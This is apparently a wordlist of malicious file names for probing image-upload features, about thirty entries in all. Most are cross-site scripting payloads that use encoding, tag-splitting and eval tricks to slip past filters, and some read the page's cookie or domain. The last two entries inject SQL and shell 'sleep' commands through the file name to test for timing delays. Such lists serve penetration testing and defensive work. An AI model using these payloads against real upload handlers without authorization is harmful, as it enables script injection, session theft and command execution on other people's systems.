"><img src=x onerror=&#97;&#108;&#101;&#114;&#116;('xss')>.png
"><svg onload=alert('xss')>.png
"><iframe src=javascript:alert('xss')>.png
"><scr"+"ipt>alert('xss')</scr"+"ipt>.png
"><im"+"g src=x onerror=alert('xss')>.png
"><img src=x onerror=alert('x'<!-- -->'ss')>.png
"><input type="text" value="XSS" onfocus="alert('xss')" autofocus>.png
"><img src="x:alert(String.fromCharCode(88,83,83))" onerror=eval(src)>.png
"><script>alert(/XSS/.source)</script>.png
"><img src=javascript:alert('xss')>.png
"><a href="javascript:alert('xss')">Click me</a>.png
"><img src=x onerror=&#97;&#108;&#101;&#114;&#116;('xss')>.jpg
"><svg onload=alert('xss')>.jpg
"><iframe src=javascript:alert('xss')>.jpg
"><scr"+"ipt>alert('xss')</scr"+"ipt>.jpg
"><im"+"g src=x onerror=alert('xss')>.jpg
"><img src=x onerror=alert('x'<!-- -->'ss')>.jpg
"><input type="text" value="XSS" onfocus="alert('xss')" autofocus>.jpg
"><img src="x:alert(String.fromCharCode(88,83,83))" onerror=eval(src)>.jpg
"><script>alert(/XSS/.source)</script>.jpg
"><img src=javascript:alert('xss')>.jpg
"><a href="javascript:alert('xss')">Click me</a>.jpg
"><img src=x onerror=alert(document.cookie)>.jpg
<img src=x onerror=alert(document.cookie)>.png
<img src=x onerror=alert(document.domain)>.jpg
<img src=x onerror=alert(document.domain)>.png
<svg onload=alert(document.cookie)>.jpg
<svg onload=alert(document.domain)>.jpg
sleep(10)-- -.jpg
;sleep 10;.jpg
